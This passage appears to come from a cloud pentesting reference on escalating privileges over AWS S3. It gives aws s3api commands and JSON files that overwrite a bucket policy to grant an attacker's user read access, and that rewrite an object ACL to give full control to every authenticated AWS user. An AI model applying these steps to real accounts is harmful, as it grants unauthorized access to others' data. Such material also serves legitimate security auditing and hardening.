An attacker holding this permission can overwrite the bucket policy and thereby grant themselves permissions over the bucket and its contents.
aws s3api put-bucket-policy --bucket <bucketName> --policy file://new-bucket-policy.json
# new-bucket-policy.json, adding a statement for the attacker-controlled <userName> (the example below grants s3:GetObject; "s3:*" would grant every S3 action)
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::1234567890:root"
},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::bucket-name"
},
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::1234567890:user/<userName>"
},
"Action": [
"s3:GetObject"
],
"Resource": "arn:aws:s3:::bucket-name/*"
}
]
}
An attacker holding this permission can overwrite an object's ACL and thereby grant themselves (in the example below, every authenticated AWS user) full control over that object.
aws s3api put-object-acl --bucket <bucketName> --key <objectKey> --access-control-policy file://object-acl-policy.json
# object-acl-policy.json, adding the Grantee:Group entry that grants FULL_CONTROL to the global AuthenticatedUsers group (i.e. any AWS account, not only this one)
{
"Owner": {
"DisplayName": "bucket-owner",
"ID": "lsjdflsdflnwelknwlefnl23423423423lk234"
},
"Grants": [
{
"Grantee": {
"DisplayName": "bucket-owner",
"ID": "lsjdflsdflnwelknwlefnl23423423423lk234",
"Type": "CanonicalUser"
},
"Permission": "FULL_CONTROL"
},
{
"Grantee": {
"Type": "Group",
"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
},
"Permission": "FULL_CONTROL"
}
]
}